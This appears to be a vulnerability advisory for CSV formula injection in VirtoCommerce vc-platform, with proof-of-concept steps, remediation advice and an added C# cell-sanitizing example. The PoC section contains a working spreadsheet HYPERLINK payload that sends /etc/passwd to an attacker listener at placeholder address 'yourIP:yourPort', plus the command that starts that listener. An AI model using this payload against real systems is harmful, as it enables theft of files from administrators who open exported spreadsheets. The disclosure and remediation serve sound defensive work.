
WS-2021-0489

Date: December 15, 2021

Overview

In vc-platform (VirtoCommerce) 3.0.0-rc.1 to 3.79.0, an attacker with low privileges can create a new product whose title contains malicious CSV (spreadsheet formula) content. When the administrator later exports the data in CSV format, the product Title field is not checked, which can lead to execution of arbitrary commands on the system.

Details

In vc-platform (VirtoCommerce), an attacker with low privileges can create a new product whose title contains malicious CSV (spreadsheet formula) content. When the administrator later exports the data in CSV format, the product Title field is not checked, which can lead to execution of arbitrary commands on the system.

PoC Details

Log in to the application with a manager-role user that has administrative privileges for the electronics store. This is considered low privilege (it is not an administrative role of the application). Click the “More” option in the left pane, then click “Catalog”. Click the “Clothing” section, then the “Accessories” section. Select the bags section and create a new product: choose “physical product”, insert the payload shown under PoC Code in the Name field of the product, and click create.
Then log in as admin and export the products (go to the same page as with the first user and click the “export” button -> VirtoCommerce Csv Export -> Start Export). You will be provided with a download link. Click it and open the CSV file. Click the name of the product (test-poc) and you will be redirected to an unknown page. Look at the terminal on the attacker server and you will see that the content of the passwd file was sent there.

PoC Code

Set up an HTTP server (replace yourPort and yourIP with the listening port and address):
python3 -m http.server yourPort --bind yourIP

Payload:
=HYPERLINK(CONCATENATE("http://yourIP:yourPort/123.txt?v="; ('file:///etc/passwd'#$passwd.A1)); "test-poc")

Affected Environments

3.0.0-rc.1 to 3.79.0

Remediation

To remediate this, ensure that no exported cell begins with any of the following characters:
Equals (“=”)
Plus (“+”)
Minus (“-”)
At (“@”)
Tab (0x09)
Carriage return (0x0D)
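The following C# helper is an added example of the remediation above; it is not VirtoCommerce code. It checks the first character of every cell against the trigger list, prefixes a matching cell with a single quote so spreadsheet applications treat it as text, and quotes the cell so embedded separators and newlines stay literal. The class name, method names and the sample product row are assumptions constructed for illustration.

```csharp
using System;
using System.Collections.Generic;
using System.Linq;

// Added example (not VirtoCommerce code): neutralize formula elements (CWE-1236)
// before a user-controlled value is written into a CSV cell.
public static class CsvCellSanitizer
{
    // Leading characters that can make a spreadsheet evaluate the cell as a formula.
    private static readonly char[] FormulaTriggers = { '=', '+', '-', '@', '\t', '\r' };

    // Returns a cell value that is safe to place in an exported CSV line.
    public static string Sanitize(string value)
    {
        if (string.IsNullOrEmpty(value))
            return "\"\"";

        // A leading trigger character is defused by prefixing a single quote,
        // which forces spreadsheet applications to read the cell as text.
        if (Array.IndexOf(FormulaTriggers, value[0]) >= 0)
            value = "'" + value;

        // Escape embedded double quotes and wrap the cell so commas and
        // line breaks inside the value do not break the CSV structure.
        return "\"" + value.Replace("\"", "\"\"") + "\"";
    }

    // Builds one CSV line from a row of cells, sanitizing each cell.
    public static string ToCsvLine(IEnumerable<string> cells)
    {
        return string.Join(",", cells.Select(Sanitize));
    }

    public static void Main()
    {
        // Constructed sample row: SKU, a product title carrying a formula, category.
        var row = new[] { "sku-001", "=HYPERLINK(\"http://example.invalid\";\"x\")", "Bags" };
        Console.WriteLine(ToCsvLine(row));
    }
}
```

Apply the check at export time to every user-controlled field (name, description, SKU and so on), not only to the Title field. Note that the single-quote prefix becomes part of the exported data, so consumers that are not spreadsheets will see it; if the export also feeds other systems, strip or replace the leading character instead of prefixing it.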

Prevention

No fix available.

Language: C#

Good to know:

Improper Neutralization of Formula Elements in a CSV File (CWE-1236)

Upgrade Version

No fix version available

Base Score:
Attack Vector (AV): Network
Attack Complexity (AC): Low
Privileges Required (PR): Low
User Interaction (UI): Required
Scope (S): Changed
Confidentiality (C): High
Integrity (I): High
Availability (A): High